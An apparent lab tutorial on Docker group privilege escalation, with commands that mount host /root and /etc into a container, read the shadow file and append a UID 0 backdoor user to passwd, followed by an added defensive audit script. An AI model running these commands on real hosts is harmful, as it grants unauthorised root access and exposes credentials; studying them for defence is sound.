Docker Penetration Testing

Uploaded by

Douglas Dias

Introduction

Today you will learn how to escalate to a root shell when Docker is running on the host machine, in other
words, Docker privilege escalation to spawn a root shell. Docker has a known issue here: all Docker
commands require sudo, because the Docker daemon needs root to run. The daemon is designed so that it
accepts commands from the root user or from any user in the docker group. This means that membership
of the docker group is the same as giving constant root access without any password.

Quick Lab setup


Execute the command below to install Docker on your localhost machine. I have used Ubuntu 18.04 here
as the target machine.

apt install docker.io

Create a local user with the least privileges, here named ignite, and add it to the "docker" group.

adduser ignite
usermod -G docker ignite
newgrp docker

To proceed to privilege escalation, you should have local access to the host machine. Therefore, here we
choose ssh to access the machine as ignite, who is a local user on this machine.

ssh ignite@<target-host>
id

We now have access to a user who is part of the docker group and, as said above, that is the same as
having constant root access without any password. We ran the command shown below. It pulls the Alpine
image from the Docker Hub registry and runs it. The -v parameter mounts a host directory as a volume
inside the container, here the host's /root directory at /mnt. The -it parameters start the container with
an interactive shell rather than as a background daemon process. Because the process inside the
container runs as root, the mounted directory is readable as soon as the container starts, which gives us
root's files on the host. After running the command, we changed into the /mnt directory and found
flag.txt.

docker run -v /root:/mnt -it alpine


id
cd /mnt
ls
cat flag.txt

Similarly, an intruder can mount other system files to escalate the privileges of the local user, such as
passwd, shadow, or SSH keys. Here we mount the /etc directory to obtain the shadow file; in the same
way, one can access the passwd file and add a privileged user of one's own.

docker run -v /etc/:/mnt -it alpine


cd /mnt
cat shadow

So, if you have access to the shadow file, you can try to crack the password hashes, and if you have access
to the passwd file, you can add your own privileged user by generating a salted password hash as shown here.

openssl passwd -1 -salt raj

Now append a new record to the passwd file for your user.

docker run -v /etc/:/mnt -it alpine


cd /mnt
echo 'raj:saltpasswd:0:0::/root:/bin/bash' >>passwd
tail passwd
su raj
id

You can observe that user raj now has UID and GID 0, the same as root. We therefore switch to raj and
get a root shell. In this way, we can escalate our permissions on the host machine.
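
From the defender's side, the two conditions this walkthrough relies on can be audited: which users are in the docker group, and whether passwd holds a UID 0 account other than root. The shell script below is an added example, not part of the original document; the function names and the sample passwd/group data (including the build user, which shows that a primary GID also counts as membership) are constructed for illustration.

```shell
#!/bin/sh
# Added audit example (not from the original document).

# Accounts other than "root" whose UID is 0, such as a record appended to passwd.
# $1 = passwd file
extra_uid0() {
    awk -F: '$3 == 0 && $1 != "root" { print $1 }' "$1"
}

# Users in the docker group: supplementary members listed in the group file
# plus users whose primary GID in passwd is the docker GID.
# $1 = passwd file, $2 = group file
docker_members() {
    gid=$(awk -F: '$1 == "docker" { print $3 }' "$2")
    [ -n "$gid" ] || return 0
    {
        awk -F: '$1 == "docker" { n = split($4, m, ",")
            for (i = 1; i <= n; i++) if (m[i] != "") print m[i] }' "$2"
        awk -F: -v g="$gid" '$4 == g { print $1 }' "$1"
    } | sort -u
}

# Constructed sample data (not real accounts) so the script runs offline.
write_sample() {
    cat > "$1/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/bash
ignite:x:1000:1000::/home/ignite:/bin/bash
build:x:1001:998::/home/build:/bin/sh
raj:saltpasswd:0:0::/root:/bin/bash
EOF
    cat > "$1/group" <<'EOF'
root:x:0:
docker:x:998:ignite
ignite:x:1000:
EOF
}

tmp=$(mktemp -d)
write_sample "$tmp"
# To audit a live host, pass /etc/passwd and /etc/group instead of the samples.
echo "root-equivalent via docker group: $(docker_members "$tmp/passwd" "$tmp/group" | tr '\n' ' ')"
echo "unexpected UID 0 accounts: $(extra_uid0 "$tmp/passwd" | tr '\n' ' ')"
rm -rf "$tmp"
```

Every name reported by docker_members should be treated as holding root on the host, and any name reported by extra_uid0 should be investigated.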
